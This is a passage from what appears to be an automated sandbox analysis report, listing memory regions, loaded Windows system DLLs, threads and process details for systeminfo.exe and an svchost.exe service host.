"c:\\windows\\system32\\msctf.dll") Region: id = 1754 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1755 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1756 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1757 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1758 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1759 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1760 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1761 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2355 start_va = 0x91cc050000 end_va = 0x91cc08ffff entry_point = 0x0 region_type = private name = "private_0x00000091cc050000" filename = "" Region: id = 2356 start_va = 0x91cc0c0000 end_va = 0x91cc0cffff entry_point = 0x0 region_type = private name = "private_0x00000091cc0c0000" filename = "" Region: id = 2357 start_va = 0x91cc0d0000 end_va = 0x91cc0dffff entry_point = 0x0 region_type = private name = "private_0x00000091cc0d0000" filename = "" Region: id = 2358 start_va = 0x91cd880000 end_va = 0x91cdbb6fff entry_point = 0x91cd880000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2359 start_va = 0x91cdbc0000 end_va = 0x91cddd0fff entry_point = 0x0 region_type = private name = "private_0x00000091cdbc0000" filename = "" Region: id = 2360 start_va = 0x91cdde0000 end_va = 0x91cdffffff entry_point = 0x0 region_type = private name = "private_0x00000091cdde0000" filename = "" Region: id = 2361 start_va = 0x91ce000000 end_va = 0x91ce110fff entry_point = 0x0 region_type = private name = "private_0x00000091ce000000" filename = "" Region: id = 2362 start_va = 0x91ce120000 end_va = 0x91ce332fff entry_point = 0x0 region_type = private name = "private_0x00000091ce120000" filename = "" Region: id = 2363 start_va = 0x91ce340000 end_va = 0x91ce451fff entry_point = 0x0 region_type = private name = "private_0x00000091ce340000" filename = "" Region: id = 2364 start_va = 0x7ff68450a000 end_va = 0x7ff68450bfff entry_point = 0x0 region_type = private name = "private_0x00007ff68450a000" filename = "" Region: id = 2365 start_va = 0x7ff9733b0000 end_va = 0x7ff973445fff entry_point = 0x7ff9733b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2366 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2367 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2368 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2369 start_va = 0x7ff974c30000 end_va = 0x7ff975257fff entry_point = 0x7ff974c30000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2370 start_va = 0x7ff975310000 end_va = 0x7ff9753c2fff entry_point = 0x7ff975310000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2371 start_va = 0x7ff975900000 end_va = 0x7ff976e24fff entry_point = 0x7ff975900000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2372 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2373 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 114 os_tid = 0xbb0 Thread: id = 115 os_tid = 0xbc0 Thread: id = 116 os_tid = 0xbc8 Process: id = "17" image_name = "systeminfo.exe" filename = "c:\\windows\\system32\\systeminfo.exe" page_root = "0x36246000" os_pid = "0xbd0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xbf0" cmd_line = "systeminfo.exe " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1835 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1836 start_va = 0x5eafe40000 end_va = 0x5eafe5ffff entry_point = 0x0 region_type = private name = "private_0x0000005eafe40000" filename = "" Region: id = 1837 start_va = 0x5eafe60000 end_va = 0x5eafe73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eafe60000" filename = "" Region: id = 1838 start_va = 0x5eafe80000 end_va = 0x5eafefffff entry_point = 0x0 region_type = private name = "private_0x0000005eafe80000" filename = "" Region: id = 1839 start_va = 0x5eaff00000 end_va = 0x5eaff03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eaff00000" filename = "" Region: id = 1840 start_va = 0x5eaff10000 end_va = 0x5eaff10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eaff10000" filename = "" Region: id = 1841 start_va = 0x5eaff20000 end_va = 0x5eaff21fff entry_point = 0x0 region_type = private name = "private_0x0000005eaff20000" filename = "" Region: id = 1842 start_va = 0x7df5ff700000 end_va = 0x7ff5ff6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff700000" filename = "" Region: id = 1843 start_va = 0x7ff6990e0000 end_va = 0x7ff699102fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6990e0000" filename = "" Region: id = 1844 start_va = 0x7ff69910d000 end_va = 0x7ff69910efff entry_point = 0x0 region_type = private name = "private_0x00007ff69910d000" filename = "" Region: id = 1845 start_va = 0x7ff69910f000 end_va = 0x7ff69910ffff entry_point = 0x0 region_type = private name = "private_0x00007ff69910f000" filename = "" Region: id = 1846 start_va = 0x7ff6997d0000 end_va = 0x7ff6997ecfff entry_point = 0x7ff6997d0000 region_type = mapped_file name = "systeminfo.exe" filename = "\\Windows\\System32\\systeminfo.exe" (normalized: "c:\\windows\\system32\\systeminfo.exe") Region: id = 1847 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1849 start_va = 0x5eaffe0000 end_va = 0x5eb00dffff entry_point = 0x0 region_type = private name = "private_0x0000005eaffe0000" filename = "" Region: id = 1850 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1851 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1852 start_va = 0x5eafe40000 end_va = 0x5eafe4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eafe40000" filename = "" Region: id = 1853 start_va = 0x5eafe50000 end_va = 0x5eafe56fff entry_point = 0x0 region_type = private name = "private_0x0000005eafe50000" filename = "" Region: id = 1854 start_va = 0x5eaff30000 end_va = 0x5eaffaffff entry_point = 0x0 region_type = private name = "private_0x0000005eaff30000" filename = "" Region: id = 1855 start_va = 0x5eaffb0000 end_va = 0x5eaffb6fff entry_point = 0x0 region_type = private name = "private_0x0000005eaffb0000" filename = "" Region: id = 1856 start_va = 0x5eaffc0000 end_va = 0x5eaffc3fff entry_point = 0x5eaffc0000 region_type = mapped_file name = "systeminfo.exe.mui" filename = "\\Windows\\System32\\en-US\\systeminfo.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\systeminfo.exe.mui") Region: id = 1857 start_va = 0x5eaffd0000 end_va = 0x5eaffd0fff entry_point = 0x0 region_type = private name = "private_0x0000005eaffd0000" filename = "" Region: id = 1858 start_va = 0x5eb00e0000 end_va = 0x5eb019dfff entry_point = 0x5eb00e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1859 start_va = 0x5eb01a0000 end_va = 0x5eb01a0fff entry_point = 0x0 region_type = private name = "private_0x0000005eb01a0000" filename = "" Region: id = 1860 start_va = 0x5eb0230000 end_va = 0x5eb023ffff entry_point = 0x0 region_type = private name = "private_0x0000005eb0230000" filename = "" Region: id = 1861 start_va = 0x5eb0240000 end_va = 0x5eb03c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eb0240000" filename = "" Region: id = 1862 start_va = 0x5eb03d0000 end_va = 0x5eb0550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eb03d0000" filename = "" Region: id = 1863 start_va = 0x5eb0560000 end_va = 0x5eb195ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eb0560000" filename = "" Region: id = 1864 start_va = 0x7ff698fe0000 end_va = 0x7ff6990dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff698fe0000" filename = "" Region: id = 1865 start_va = 0x7ff69910b000 end_va = 0x7ff69910cfff entry_point = 0x0 region_type = private name = "private_0x00007ff69910b000" filename = "" Region: id = 1866 start_va = 0x7ff96c360000 end_va = 0x7ff96c369fff entry_point = 0x7ff96c360000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1867 start_va = 0x7ff9722a0000 end_va = 0x7ff9722edfff entry_point = 0x7ff9722a0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1868 start_va = 0x7ff973b90000 end_va = 0x7ff973babfff entry_point = 0x7ff973b90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1869 start_va = 0x7ff974520000 end_va = 0x7ff97454bfff entry_point = 0x7ff974520000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1870 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1871 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1872 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1873 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1874 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1875 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1876 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1877 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1878 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1879 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1880 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1881 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1882 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1883 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1884 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1885 start_va = 0x5eb01b0000 end_va = 0x5eb01b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eb01b0000" filename = "" Region: id = 1886 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1887 start_va = 0x5eb01c0000 end_va = 0x5eb01c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005eb01c0000" filename = "" Region: id = 1888 start_va = 0x7ff96c2d0000 end_va = 0x7ff96c2e0fff entry_point = 0x7ff96c2d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1889 start_va = 0x7ff96df20000 end_va = 0x7ff96df9efff entry_point = 0x7ff96df20000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1890 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1891 start_va = 0x5eb1960000 end_va = 0x5eb1c96fff entry_point = 0x5eb1960000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1892 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1893 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1894 start_va = 0x5eb1ca0000 end_va = 0x5eb1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000005eb1ca0000" filename = "" Region: id = 1895 start_va = 0x5eb1d20000 end_va = 0x5eb1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000005eb1d20000" filename = "" Region: id = 1896 start_va = 0x5eb1da0000 end_va = 0x5eb1e1ffff entry_point = 0x0 region_type = private name = "private_0x0000005eb1da0000" filename = "" Region: id = 1897 start_va = 0x7ff699105000 end_va = 0x7ff699106fff entry_point = 0x0 region_type = private name = "private_0x00007ff699105000" filename = "" Region: id = 1898 start_va = 0x7ff699107000 end_va = 0x7ff699108fff entry_point = 0x0 region_type = private name = "private_0x00007ff699107000" filename = "" Region: id = 1899 start_va = 0x7ff699109000 end_va = 0x7ff69910afff entry_point = 0x0 region_type = private name = "private_0x00007ff699109000" filename = "" Region: id = 1900 start_va = 0x7ff96b4a0000 end_va = 0x7ff96b4b3fff entry_point = 0x7ff96b4a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1901 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2252 start_va = 0x7ff96b7d0000 end_va = 0x7ff96b8c7fff entry_point = 0x7ff96b7d0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Thread: id = 119 os_tid = 0xbbc Thread: id = 120 os_tid = 0xbac Thread: id = 121 os_tid = 0x2ec Thread: id = 122 os_tid = 0x2e8 Thread: id = 123 os_tid = 0x4b0 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xd65f000" os_pid = "0x324" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "17" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b836" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1902 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1903 start_va = 0x32d3b10000 end_va = 0x32d3b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3b10000" filename = "" Region: id = 1904 start_va = 0x32d3b20000 end_va = 0x32d3b20fff entry_point = 0x32d3b20000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1905 start_va = 0x32d3b30000 end_va = 0x32d3b43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3b30000" filename = "" Region: id = 1906 start_va = 0x32d3b50000 end_va = 0x32d3bcffff entry_point = 0x0 region_type = private name = "private_0x00000032d3b50000" filename = "" Region: id = 1907 start_va = 0x32d3bd0000 end_va = 0x32d3bd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3bd0000" filename = "" Region: id = 1908 start_va = 0x32d3be0000 end_va = 0x32d3be0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3be0000" filename = "" Region: id = 1909 start_va = 0x32d3bf0000 end_va = 0x32d3bf1fff entry_point = 0x0 region_type = private name = "private_0x00000032d3bf0000" filename = "" Region: id = 1910 start_va = 0x32d3c00000 end_va = 0x32d3c00fff entry_point = 0x0 region_type = private name = "private_0x00000032d3c00000" filename = "" Region: id = 1911 start_va = 0x32d3c10000 end_va = 0x32d3c10fff entry_point = 0x0 region_type = private name = "private_0x00000032d3c10000" filename = "" Region: id = 1912 start_va = 0x32d3c20000 end_va = 0x32d3c26fff entry_point = 0x0 region_type = private name = "private_0x00000032d3c20000" filename = "" Region: id = 1913 start_va = 0x32d3c30000 end_va = 0x32d3cedfff entry_point = 0x32d3c30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1914 start_va = 0x32d3cf0000 end_va = 0x32d3cf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3cf0000" filename = "" Region: id = 1915 start_va = 0x32d3d00000 end_va = 0x32d3dfffff entry_point = 0x0 region_type = private name = "private_0x00000032d3d00000" filename = "" Region: id = 1916 start_va = 0x32d3e00000 end_va = 0x32d3e04fff entry_point = 0x32d3e00000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1917 start_va = 0x32d3e10000 end_va = 0x32d3e1ffff entry_point = 0x32d3e10000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1918 start_va = 0x32d3e20000 end_va = 0x32d3e22fff entry_point = 0x32d3e20000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1919 start_va = 0x32d3e80000 end_va = 0x32d3e80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3e80000" filename = "" Region: id = 1920 start_va = 0x32d3e90000 end_va = 0x32d3e91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3e90000" filename = "" Region: id = 1921 start_va = 0x32d3ea0000 end_va = 0x32d3ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d3ea0000" filename = "" Region: id = 1922 start_va = 0x32d3eb0000 end_va = 0x32d3ebcfff entry_point = 0x32d3eb0000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1923 start_va = 0x32d3ec0000 end_va = 0x32d3ec6fff entry_point = 0x0 region_type = private name = "private_0x00000032d3ec0000" filename = "" Region: id = 1924 start_va = 0x32d3ed0000 end_va = 0x32d3edcfff entry_point = 0x32d3ed0000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1925 start_va = 0x32d3ee0000 end_va = 0x32d3ee3fff entry_point = 0x32d3ee0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1926 start_va = 0x32d3ef0000 end_va = 0x32d3ef3fff entry_point = 0x32d3ef0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1927 start_va = 0x32d3f00000 end_va = 0x32d3ffffff entry_point = 0x0 region_type = private name = "private_0x00000032d3f00000" filename = "" Region: id = 1928 start_va = 0x32d4000000 end_va = 0x32d4187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d4000000" filename = "" Region: id = 1929 start_va = 0x32d4190000 end_va = 0x32d4310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d4190000" filename = "" Region: id = 1930 start_va = 0x32d4320000 end_va = 0x32d43dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d4320000" filename = "" Region: id = 1931 start_va = 0x32d43e0000 end_va = 0x32d44dffff entry_point = 0x0 region_type = private name = "private_0x00000032d43e0000" filename = "" Region: id = 1932 start_va = 0x32d44e0000 end_va = 0x32d455ffff entry_point = 0x0 region_type = private name = "private_0x00000032d44e0000" filename = "" Region: id = 1933 start_va = 0x32d4560000 end_va = 0x32d4570fff entry_point = 0x32d4560000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1934 start_va = 0x32d4580000 end_va = 0x32d4581fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000032d4580000" filename = "" Region: id = 1935 start_va = 0x32d4590000 end_va = 0x32d4598fff entry_point = 0x32d4590000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1936 start_va = 0x32d45a0000 end_va = 0x32d45a6fff entry_point = 0x0 region_type = private name = "private_0x00000032d45a0000" filename = "" Region: id = 